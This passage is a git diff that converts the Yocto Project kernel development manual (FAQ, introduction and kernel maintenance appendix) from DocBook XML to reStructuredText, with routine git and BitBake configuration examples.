- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'kernel-dev-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel">A</xsl:param>
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/kernel-dev/kernel-dev-faq.rst b/documentation/kernel-dev/kernel-dev-faq.rst
new file mode 100644
index 0000000000..d6be98a0ac
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-faq.rst
@@ -0,0 +1,80 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Kernel Development FAQ
+**********************
+
+.. _kernel-dev-faq-section:
+
+Common Questions and Solutions
+==============================
+
+The following lists some solutions for common questions.
+
+How do I use my own Linux kernel ``.config`` file?
+--------------------------------------------------
+
+Refer to the
+":ref:`kernel-dev/kernel-dev-common:changing the configuration`"
+section for information.
+
+How do I create configuration fragments?
+----------------------------------------
+
+A: Refer to the
+":ref:`kernel-dev/kernel-dev-common:creating configuration fragments`"
+section for information.
+
+How do I use my own Linux kernel sources?
+-----------------------------------------
+
+Refer to the
+":ref:`kernel-dev/kernel-dev-common:working with your own sources`"
+section for information.
+
+How do I install/not-install the kernel image on the rootfs?
+------------------------------------------------------------
+
+The kernel image (e.g. ``vmlinuz``) is provided by the
+``kernel-image`` package. Image recipes depend on ``kernel-base``. To
+specify whether or not the kernel image is installed in the generated
+root filesystem, override ``RDEPENDS_${KERNEL_PACKAGE_NAME}-base`` to include or not
+include "kernel-image". See the
+":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+section in the
+Yocto Project Development Tasks Manual for information on how to use an
+append file to override metadata.
+
+How do I install a specific kernel module?
+------------------------------------------
+
+Linux kernel modules are packaged individually. To ensure a
+specific kernel module is included in an image, include it in the
+appropriate machine :term:`RRECOMMENDS` variable.
+These other variables are useful for installing specific modules:
+- :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+- :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+- :term:`MACHINE_EXTRA_RDEPENDS`
+- :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+For example, set the following in the ``qemux86.conf`` file to include
+the ``ab123`` kernel modules with images built for the ``qemux86``
+machine:
+::
+
+ MACHINE_EXTRA_RRECOMMENDS += "kernel-module-ab123"
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`" section.
+
+How do I change the Linux kernel command line?
+----------------------------------------------
+
+The Linux kernel command line is
+typically specified in the machine config using the ``APPEND`` variable.
+For example, you can add some helpful debug information doing the
+following:
+::
+
+ APPEND += "printk.time=y initcall_debug debug"
+
diff --git a/documentation/kernel-dev/kernel-dev-faq.xml b/documentation/kernel-dev/kernel-dev-faq.xml
deleted file mode 100644
index c3a20465a0..0000000000
--- a/documentation/kernel-dev/kernel-dev-faq.xml
+++ /dev/null
@@ -1,142 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-faq'>
-<title>Kernel Development FAQ</title>
-
-<section id='kernel-dev-faq-section'>
- <title>Common Questions and Solutions</title>
-
- <para>
- The following lists some solutions for common questions.
-
-
- <qandaset>
- <qandaentry>
- <question>
- <para>
- How do I use my own Linux kernel <filename>.config</filename>
- file?
- </para>
- </question>
- <answer>
- <para>
- Refer to the "<link linkend='changing-the-configuration'>Changing the Configuration</link>"
- section for information.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I create configuration fragments?
- </para>
- </question>
- <answer>
- <para>
- Refer to the
- "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
- section for information.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I use my own Linux kernel sources?
- </para>
- </question>
- <answer>
- <para>
- Refer to the "<link linkend='working-with-your-own-sources'>Working With Your Own Sources</link>"
- section for information.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I install/not-install the kernel image on the rootfs?
- </para>
- </question>
- <answer>
- <para>
- The kernel image (e.g. <filename>vmlinuz</filename>) is provided
- by the <filename>kernel-image</filename> package.
- Image recipes depend on <filename>kernel-base</filename>.
- To specify whether or not the kernel
- image is installed in the generated root filesystem, override
- <filename>RDEPENDS_kernel-base</filename> to include or not
- include "kernel-image".</para>
- <para>See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
- section in the Yocto Project Development Tasks Manual
- for information on how to use an append file to
- override metadata.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I install a specific kernel module?
- </para>
- </question>
- <answer>
- <para>
- Linux kernel modules are packaged individually.
- To ensure a specific kernel module is included in an image,
- include it in the appropriate machine
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
- variable.</para>
- <para>These other variables are useful for installing specific
- modules:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RDEPENDS'><filename>MACHINE_EXTRA_RDEPENDS</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>
- </literallayout>
- For example, set the following in the <filename>qemux86.conf</filename>
- file to include the <filename>ab123</filename> kernel modules
- with images built for the <filename>qemux86</filename> machine:
- <literallayout class='monospaced'>
- MACHINE_EXTRA_RRECOMMENDS += "kernel-module-ab123"
- </literallayout>
- For more information, see the
- "<link linkend='incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</link>"
- section.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I change the Linux kernel command line?
- </para>
- </question>
- <answer>
- <para>
- The Linux kernel command line is typically specified in
- the machine config using the <filename>APPEND</filename> variable.
- For example, you can add some helpful debug information doing
- the following:
- <literallayout class='monospaced'>
- APPEND += "printk.time=y initcall_debug debug"
- </literallayout>
- </para>
- </answer>
- </qandaentry>
- </qandaset>
- </para>
-</section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-intro.rst b/documentation/kernel-dev/kernel-dev-intro.rst
new file mode 100644
index 0000000000..5679a0ab80
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-intro.rst
@@ -0,0 +1,182 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+.. _kernel-dev-overview:
+
+Overview
+========
+
+Regardless of how you intend to make use of the Yocto Project, chances
+are you will work with the Linux kernel. This manual describes how to
+set up your build host to support kernel development, introduces the
+kernel development process, provides background information on the Yocto
+Linux kernel :term:`Metadata`, describes
+common tasks you can perform using the kernel tools, shows you how to
+use the kernel Metadata needed to work with the kernel inside the Yocto
+Project, and provides insight into how the Yocto Project team develops
+and maintains Yocto Linux kernel Git repositories and Metadata.
+
+Each Yocto Project release has a set of Yocto Linux kernel recipes,
+whose Git repositories you can view in the Yocto
+:yocto_git:`Source Repositories <>` under the "Yocto Linux Kernel"
+heading. New recipes for the release track the latest Linux kernel
+upstream developments from https://www.kernel.org and introduce
+newly-supported platforms. Previous recipes in the release are refreshed
+and supported for at least one additional Yocto Project release. As they
+align, these previous releases are updated to include the latest from
+the Long Term Support Initiative (LTSI) project. You can learn more
+about Yocto Linux kernels and LTSI in the ":ref:`Yocto Project Kernel
+Development and Maintenance <kernel-big-picture>`" section.
+
+Also included is a Yocto Linux kernel development recipe
+(``linux-yocto-dev.bb``) should you want to work with the very latest in
+upstream Yocto Linux kernel development and kernel Metadata development.
+
+.. note::
+
+ For more on Yocto Linux kernels, see the
+ ":ref:`Yocto Project Kernel Development and Maintenance <kernel-big-picture>`"
+ section.
+
+The Yocto Project also provides a powerful set of kernel tools for
+managing Yocto Linux kernel sources and configuration data. You can use
+these tools to make a single configuration change, apply multiple
+patches, or work with your own kernel sources.
+
+In particular, the kernel tools allow you to generate configuration
+fragments that specify only what you must, and nothing more.
+Configuration fragments only need to contain the highest level visible
+``CONFIG`` options as presented by the Yocto Linux kernel ``menuconfig``
+system. Contrast this against a complete Yocto Linux kernel ``.config``
+file, which includes all the automatically selected ``CONFIG`` options.
+This efficiency reduces your maintenance effort and allows you to
+further separate your configuration in ways that make sense for your
+project. A common split separates policy and hardware. For example, all
+your kernels might support the ``proc`` and ``sys`` filesystems, but
+only specific boards require sound, USB, or specific drivers. Specifying
+these configurations individually allows you to aggregate them together
+as needed, but maintains them in only one place. Similar logic applies
+to separating source changes.
+
+If you do not maintain your own kernel sources and need to make only
+minimal changes to the sources, the released recipes provide a vetted
+base upon which to layer your changes. Doing so allows you to benefit
+from the continual kernel integration and testing performed during
+development of the Yocto Project.
+
+If, instead, you have a very specific Linux kernel source tree and are
+unable to align with one of the official Yocto Linux kernel recipes, an
+alternative exists by which you can use the Yocto Project Linux kernel
+tools with your own kernel sources.
+
+The remainder of this manual provides instructions for completing
+specific Linux kernel development tasks. These instructions assume you
+are comfortable working with
+`BitBake <https://openembedded.org/wiki/Bitbake>`__ recipes and basic
+open-source development tools. Understanding these concepts will
+facilitate the process of working with the kernel recipes. If you find
+you need some additional background, please be sure to review and
+understand the following documentation:
+
+- :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+- :doc:`../overview-manual/overview-manual`.
+
+- :ref:`devtool
+ workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+ as described in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+- The ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual.
+
+- The "`Kernel Modification
+ Workflow <#kernel-modification-workflow>`__" section.
+
+Kernel Modification Workflow
+============================
+
+Kernel modification involves changing the Yocto Project kernel, which
+could involve changing configuration options as well as adding new
+kernel recipes. Configuration changes can be added in the form of
+configuration fragments, while recipe modification comes through the
+kernel's ``recipes-kernel`` area in a kernel layer you create.
+
+This section presents a high-level overview of the Yocto Project kernel
+modification workflow. The illustration and accompanying list provide
+general information and references for further information.
+
+.. image:: figures/kernel-dev-flow.png
+ :align: center
+
+1. *Set up Your Host Development System to Support Development Using the
+ Yocto Project*: See the ":doc:`../dev-manual/dev-manual-start`" section in
+ the Yocto Project Development Tasks Manual for options on how to get
+ a build host ready to use the Yocto Project.
+
+2. *Set Up Your Host Development System for Kernel Development:* It is
+ recommended that you use ``devtool`` and an extensible SDK for kernel
+ development. Alternatively, you can use traditional kernel
+ development methods with the Yocto Project. Either way, there are
+ steps you need to take to get the development environment ready.
+
+ Using ``devtool`` and the eSDK requires that you have a clean build
+ of the image and that you are set up with the appropriate eSDK. For
+ more information, see the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+ section.
+
+ Using traditional kernel development requires that you have the
+ kernel source available in an isolated local Git repository. For more
+ information, see the
+ ":ref:`kernel-dev/kernel-dev-common:getting ready for traditional kernel development`"
+ section.
+
+3. *Make Changes to the Kernel Source Code if applicable:* Modifying the
+ kernel does not always mean directly changing source files. However,
+ if you have to do this, you make the changes to the files in the
+ eSDK's Build Directory if you are using ``devtool``. For more
+ information, see the
+ ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+ section.
+
+ If you are using traditional kernel development, you edit the source
+ files in the kernel's local Git repository. For more information, see the
+ ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+ section.
+
+4. *Make Kernel Configuration Changes if Applicable:* If your situation
+ calls for changing the kernel's configuration, you can use
+ :ref:`menuconfig <kernel-dev/kernel-dev-common:using \`\`menuconfig\`\`>`,
+ which allows you to
+ interactively develop and test the configuration changes you are
+ making to the kernel. Saving changes you make with ``menuconfig``
+ updates the kernel's ``.config`` file.
+
+ .. note::
+
+ Try to resist the temptation to directly edit an existing ``.config``
+ file, which is found in the Build Directory among the source code
+ used for the build. Doing so, can produce unexpected results when
+ the OpenEmbedded build system regenerates the configuration file.
+
+ Once you are satisfied with the configuration changes made using
+ ``menuconfig`` and you have saved them, you can directly compare the
+ resulting ``.config`` file against an existing original and gather
+ those changes into a
+ :ref:`configuration fragment file <creating-config-fragments>` to be
+ referenced from within the kernel's ``.bbappend`` file.
+
+ Additionally, if you are working in a BSP layer and need to modify
+ the BSP's kernel's configuration, you can use ``menuconfig``.
+
+5. *Rebuild the Kernel Image With Your Changes:* Rebuilding the kernel
+ image applies your changes. Depending on your target hardware, you
+ can verify your changes on actual hardware or perhaps QEMU.
+
+The remainder of this developer's guide covers common tasks typically
+used during kernel development, advanced Metadata usage, and Yocto Linux
+kernel maintenance concepts.
diff --git a/documentation/kernel-dev/kernel-dev-intro.xml b/documentation/kernel-dev/kernel-dev-intro.xml
deleted file mode 100644
index 4e4fd282a5..0000000000
--- a/documentation/kernel-dev/kernel-dev-intro.xml
+++ /dev/null
@@ -1,259 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-intro'>
-<title>Introduction</title>
-
-<section id='kernel-dev-overview'>
- <title>Overview</title>
-
- <para>
- Regardless of how you intend to make use of the Yocto Project,
- chances are you will work with the Linux kernel.
- This manual describes how to set up your build host to support
- kernel development, introduces the kernel development process,
- provides background information on the Yocto Linux kernel
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
- describes common tasks you can perform using the kernel tools,
- shows you how to use the kernel Metadata needed to work with
- the kernel inside the Yocto Project, and provides insight into how
- the Yocto Project team develops and maintains Yocto Linux kernel
- Git repositories and Metadata.
- </para>
-
- <para>
- Each Yocto Project release has a set of Yocto Linux kernel recipes,
- whose Git repositories you can view in the Yocto
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink> under
- the "Yocto Linux Kernel" heading.
- New recipes for the release track the latest Linux kernel
- upstream developments from
- <ulink url='http://www.kernel.org'></ulink> and introduce
- newly-supported platforms.
- Previous recipes in the release are refreshed and supported for at
- least one additional Yocto Project release.
- As they align, these previous releases are updated to include the
- latest from the Long Term Support Initiative (LTSI) project.
- You can learn more about Yocto Linux kernels and LTSI in the
- "<link linkend='kernel-big-picture'>Yocto Project Kernel Development and Maintenance</link>"
- section.
- </para>
-
- <para>
- Also included is a Yocto Linux kernel development recipe
- (<filename>linux-yocto-dev.bb</filename>) should you want to work
- with the very latest in upstream Yocto Linux kernel development and
- kernel Metadata development.
- <note>
- For more on Yocto Linux kernels, see the
- "<link linkend='kernel-big-picture'>Yocto Project Kernel Development and Maintenance</link>
- section.
- </note>
- </para>
-
- <para>
- The Yocto Project also provides a powerful set of kernel
- tools for managing Yocto Linux kernel sources and configuration data.
- You can use these tools to make a single configuration change,
- apply multiple patches, or work with your own kernel sources.
- </para>
-
- <para>
- In particular, the kernel tools allow you to generate configuration
- fragments that specify only what you must, and nothing more.
- Configuration fragments only need to contain the highest level
- visible <filename>CONFIG</filename> options as presented by the
- Yocto Linux kernel <filename>menuconfig</filename> system.
- Contrast this against a complete Yocto Linux kernel
- <filename>.config</filename> file, which includes all the automatically
- selected <filename>CONFIG</filename> options.
- This efficiency reduces your maintenance effort and allows you
- to further separate your configuration in ways that make sense for
- your project.
- A common split separates policy and hardware.
- For example, all your kernels might support the
- <filename>proc</filename> and <filename>sys</filename> filesystems,
- but only specific boards require sound, USB, or specific drivers.
- Specifying these configurations individually allows you to aggregate
- them together as needed, but maintains them in only one place.
- Similar logic applies to separating source changes.
- </para>
-
- <para>
- If you do not maintain your own kernel sources and need to make
- only minimal changes to the sources, the released recipes provide a
- vetted base upon which to layer your changes.
- Doing so allows you to benefit from the continual kernel
- integration and testing performed during development of the
- Yocto Project.
- </para>
-
- <para>
- If, instead, you have a very specific Linux kernel source tree
- and are unable to align with one of the official Yocto Linux kernel
- recipes, an alternative exists by which you can use the Yocto
- Project Linux kernel tools with your own kernel sources.
- </para>
-
- <para>
- The remainder of this manual provides instructions for completing
- specific Linux kernel development tasks.
- These instructions assume you are comfortable working with
- <ulink url='http://openembedded.org/wiki/Bitbake'>BitBake</ulink>
- recipes and basic open-source development tools.
- Understanding these concepts will facilitate the process of working
- with the kernel recipes.
- If you find you need some additional background, please be sure to
- review and understand the following documentation:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
- document.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename> workflow</ulink>
- as described in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para></listitem>
- <listitem><para>
- The
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- The
- "<link linkend='kernel-modification-workflow'>Kernel Modification Workflow</link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='kernel-modification-workflow'>
- <title>Kernel Modification Workflow</title>
-
- <para>
- Kernel modification involves changing the Yocto Project kernel,
- which could involve changing configuration options as well as adding
- new kernel recipes.
- Configuration changes can be added in the form of configuration
- fragments, while recipe modification comes through the kernel's
- <filename>recipes-kernel</filename> area in a kernel layer you create.
- </para>
-
- <para>
- This section presents a high-level overview of the Yocto Project
- kernel modification workflow.
- The illustration and accompanying list provide general information
- and references for further information.
- <imagedata fileref="figures/kernel-dev-flow.png"
- width="9in" depth="5in" align="center" scalefit="1" />
- </para>
-
- <para>
- <orderedlist>
- <listitem><para>
-
-
- <emphasis>Set up Your Host Development System to Support
- Development Using the Yocto Project</emphasis>:
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-start'>Setting Up the Development Host to Use the Yocto Project</ulink>"
- section in the Yocto Project Development Tasks Manual for
- options on how to get a build host ready to use the Yocto
- Project.
- </para></listitem>
- <listitem><para>
- <emphasis>Set Up Your Host Development System for Kernel Development:</emphasis>
- It is recommended that you use <filename>devtool</filename>
- and an extensible SDK for kernel development.
- Alternatively, you can use traditional kernel development
- methods with the Yocto Project.
- Either way, there are steps you need to take to get the
- development environment ready.</para>
-
- <para>Using <filename>devtool</filename> and the eSDK requires
- that you have a clean build of the image and that you are
- set up with the appropriate eSDK.
- For more information, see the
- "<link linkend='getting-ready-to-develop-using-devtool'>Getting Ready to Develop Using <filename>devtool</filename></link>"
- section.</para>
-
- <para>Using traditional kernel development requires that you
- have the kernel source available in an isolated local Git
- repository.
- For more information, see the
- "<link linkend='getting-ready-for-traditional-kernel-development'>Getting Ready for Traditional Kernel Development</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Changes to the Kernel Source Code if
- applicable:</emphasis>
- Modifying the kernel does not always mean directly
- changing source files.
- However, if you have to do this, you make the changes to the
- files in the eSDK's Build Directory if you are using
- <filename>devtool</filename>.
- For more information, see the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- section.</para>
-
- <para>If you are using traditional kernel development, you
- edit the source files in the kernel's local Git repository.
- For more information, see the
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Kernel Configuration Changes if
- Applicable:</emphasis>
- If your situation calls for changing the kernel's
- configuration, you can use
- <link linkend='using-menuconfig'><filename>menuconfig</filename></link>,
- which allows you to interactively develop and test the
- configuration changes you are making to the kernel.
- Saving changes you make with <filename>menuconfig</filename>
- updates the kernel's <filename>.config</filename> file.
- <note><title>Warning</title>
- Try to resist the temptation to directly edit an
- existing <filename>.config</filename> file, which is
- found in the Build Directory among the source code
- used for the build.
- Doing so, can produce unexpected results when the
- OpenEmbedded build system regenerates the configuration
- file.
- </note>
- Once you are satisfied with the configuration
- changes made using <filename>menuconfig</filename>
- and you have saved them, you can directly compare the
- resulting <filename>.config</filename> file against an
- existing original and gather those changes into a
- <link linkend='creating-config-fragments'>configuration fragment file</link>
- to be referenced from within the kernel's
- <filename>.bbappend</filename> file.</para>
-
- <para>Additionally, if you are working in a BSP layer
- and need to modify the BSP's kernel's configuration,
- you can use <filename>menuconfig</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Rebuild the Kernel Image With Your Changes:</emphasis>
- Rebuilding the kernel image applies your changes.
- Depending on your target hardware, you can verify your changes
- on actual hardware or perhaps QEMU.
- </para></listitem>
- </orderedlist>
- The remainder of this developer's guide covers common tasks typically
- used during kernel development, advanced Metadata usage, and Yocto Linux
- kernel maintenance concepts.
- </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-maint-appx.rst b/documentation/kernel-dev/kernel-dev-maint-appx.rst
new file mode 100644
index 0000000000..69f680688f
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-maint-appx.rst
@@ -0,0 +1,239 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************
+Kernel Maintenance
+******************
+
+Tree Construction
+=================
+
+This section describes construction of the Yocto Project kernel source
+repositories as accomplished by the Yocto Project team to create Yocto
+Linux kernel repositories. These kernel repositories are found under the
+heading "Yocto Linux Kernel" at :yocto_git:`/` and
+are shipped as part of a Yocto Project release. The team creates these
+repositories by compiling and executing the set of feature descriptions
+for every BSP and feature in the product. Those feature descriptions
+list all necessary patches, configurations, branches, tags, and feature
+divisions found in a Yocto Linux kernel. Thus, the Yocto Project Linux
+kernel repository (or tree) and accompanying Metadata in the
+``yocto-kernel-cache`` are built.
+
+The existence of these repositories allow you to access and clone a
+particular Yocto Project Linux kernel repository and use it to build
+images based on their configurations and features.
+
+You can find the files used to describe all the valid features and BSPs
+in the Yocto Project Linux kernel in any clone of the Yocto Project
+Linux kernel source repository and ``yocto-kernel-cache`` Git trees. For
+example, the following commands clone the Yocto Project baseline Linux
+kernel that branches off ``linux.org`` version 4.12 and the
+``yocto-kernel-cache``, which contains stores of kernel Metadata:
+::
+
+ $ git clone git://git.yoctoproject.org/linux-yocto-4.12
+ $ git clone git://git.yoctoproject.org/linux-kernel-cache
+
+For more information on
+how to set up a local Git repository of the Yocto Project Linux kernel
+files, see the
+":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+section.
+
+Once you have cloned the kernel Git repository and the cache of Metadata
+on your local machine, you can discover the branches that are available
+in the repository using the following Git command:
+::
+
+ $ git branch -a
+
+Checking out a branch allows you to work with a particular Yocto Linux
+kernel. For example, the following commands check out the
+"standard/beagleboard" branch of the Yocto Linux kernel repository and
+the "yocto-4.12" branch of the ``yocto-kernel-cache`` repository:
+::
+
+ $ cd ~/linux-yocto-4.12
+ $ git checkout -b my-kernel-4.12 remotes/origin/standard/beagleboard
+ $ cd ~/linux-kernel-cache
+ $ git checkout -b my-4.12-metadata remotes/origin/yocto-4.12
+
+.. note::
+
+ Branches in the ``yocto-kernel-cache`` repository correspond to Yocto Linux
+ kernel versions (e.g. "yocto-4.12", "yocto-4.10", "yocto-4.9", and so forth).
+
+Once you have checked out and switched to appropriate branches, you can
+see a snapshot of all the kernel source files used to used to build that
+particular Yocto Linux kernel for a particular board.
+
+To see the features and configurations for a particular Yocto Linux
+kernel, you need to examine the ``yocto-kernel-cache`` Git repository.
+As mentioned, branches in the ``yocto-kernel-cache`` repository
+correspond to Yocto Linux kernel versions (e.g. ``yocto-4.12``).
+Branches contain descriptions in the form of ``.scc`` and ``.cfg``
+files.
+
+You should realize, however, that browsing your local
+``yocto-kernel-cache`` repository for feature descriptions and patches
+is not an effective way to determine what is in a particular kernel
+branch. Instead, you should use Git directly to discover the changes in
+a branch. Using Git is an efficient and flexible way to inspect changes
+to the kernel.
+
+.. note::
+
+ Ground up reconstruction of the complete kernel tree is an action
+ only taken by the Yocto Project team during an active development
+ cycle. When you create a clone of the kernel Git repository, you are
+ simply making it efficiently available for building and development.
+
+The following steps describe what happens when the Yocto Project Team
+constructs the Yocto Project kernel source Git repository (or tree)
+found at :yocto_git:`/` given the introduction of a new
+top-level kernel feature or BSP. The following actions effectively
+provide the Metadata and create the tree that includes the new feature,
+patch, or BSP:
+
+1. *Pass Feature to the OpenEmbedded Build System:* A top-level kernel
+ feature is passed to the kernel build subsystem. Normally, this
+ feature is a BSP for a particular kernel type.
+
+2. *Locate Feature:* The file that describes the top-level feature is
+ located by searching these system directories:
+
+ - The in-tree kernel-cache directories, which are located in the
+ :yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache/tree/bsp>`
+ repository organized under the "Yocto Linux Kernel" heading in the
+ :yocto_git:`Yocto Project Source Repositories <>`.
+
+ - Areas pointed to by ``SRC_URI`` statements found in kernel recipes.
+
+ For a typical build, the target of the search is a feature
+ description in an ``.scc`` file whose name follows this format (e.g.
+ ``beaglebone-standard.scc`` and ``beaglebone-preempt-rt.scc``):
+ ::
+
+ bsp_root_name-kernel_type.scc
+
+3. *Expand Feature:* Once located, the feature description is either
+ expanded into a simple script of actions, or into an existing
+ equivalent script that is already part of the shipped kernel.
+
+4. *Append Extra Features:* Extra features are appended to the top-level
+ feature description. These features can come from the
+ :term:`KERNEL_FEATURES`
+ variable in recipes.
+
+5. *Locate, Expand, and Append Each Feature:* Each extra feature is
+ located, expanded and appended to the script as described in step
+ three.
+
+6. *Execute the Script:* The script is executed to produce files
+ ``.scc`` and ``.cfg`` files in appropriate directories of the
+ ``yocto-kernel-cache`` repository. These files are descriptions of
+ all the branches, tags, patches and configurations that need to be
+ applied to the base Git repository to completely create the source
+ (build) branch for the new BSP or feature.
+
+7. *Clone Base Repository:* The base repository is cloned, and the
+ actions listed in the ``yocto-kernel-cache`` directories are applied
+ to the tree.
+
+8. *Perform Cleanup:* The Git repositories are left with the desired
+ branches checked out and any required branching, patching and tagging
+ has been performed.
+
+The kernel tree and cache are ready for developer consumption to be
+locally cloned, configured, and built into a Yocto Project kernel
+specific to some target hardware.
+
+.. note::
+
+ - The generated ``yocto-kernel-cache`` repository adds to the kernel
+ as shipped with the Yocto Project release. Any add-ons and
+ configuration data are applied to the end of an existing branch.
+ The full repository generation that is found in the official Yocto
+ Project kernel repositories at :yocto_git:`/` is the
+ combination of all supported boards and configurations.
+
+ - The technique the Yocto Project team uses is flexible and allows
+ for seamless blending of an immutable history with additional
+ patches specific to a deployment. Any additions to the kernel
+ become an integrated part of the branches.
+
+ - The full kernel tree that you see on :yocto_git:`/` is
+ generated through repeating the above steps for all valid BSPs.
+ The end result is a branched, clean history tree that makes up the
+ kernel for a given release. You can see the script (``kgit-scc``)
+ responsible for this in the
+ :yocto_git:`yocto-kernel-tools </cgit.cgi/yocto-kernel-tools/tree/tools>`
+ repository.
+
+ - The steps used to construct the full kernel tree are the same
+ steps that BitBake uses when it builds a kernel image.
+
+Build Strategy
+==============
+
+Once you have cloned a Yocto Linux kernel repository and the cache
+repository (``yocto-kernel-cache``) onto your development system, you
+can consider the compilation phase of kernel development, which is
+building a kernel image. Some prerequisites exist that are validated by
+the build process before compilation starts:
+
+- The :term:`SRC_URI` points to the
+ kernel Git repository.
+
+- A BSP build branch with Metadata exists in the ``yocto-kernel-cache``
+ repository. The branch is based on the Yocto Linux kernel version and
+ has configurations and features grouped under the
+ ``yocto-kernel-cache/bsp`` directory. For example, features and
+ configurations for the BeagleBone Board assuming a
+ ``linux-yocto_4.12`` kernel reside in the following area of the
+ ``yocto-kernel-cache`` repository: yocto-kernel-cache/bsp/beaglebone
+
+ .. note::
+
+ In the previous example, the "yocto-4.12" branch is checked out in
+ the ``yocto-kernel-cache`` repository.
+
+The OpenEmbedded build system makes sure these conditions exist before
+attempting compilation. Other means, however, do exist, such as
+bootstrapping a BSP.
+
+Before building a kernel, the build process verifies the tree and
+configures the kernel by processing all of the configuration "fragments"
+specified by feature descriptions in the ``.scc`` files. As the features
+are compiled, associated kernel configuration fragments are noted and
+recorded in the series of directories in their compilation order. The
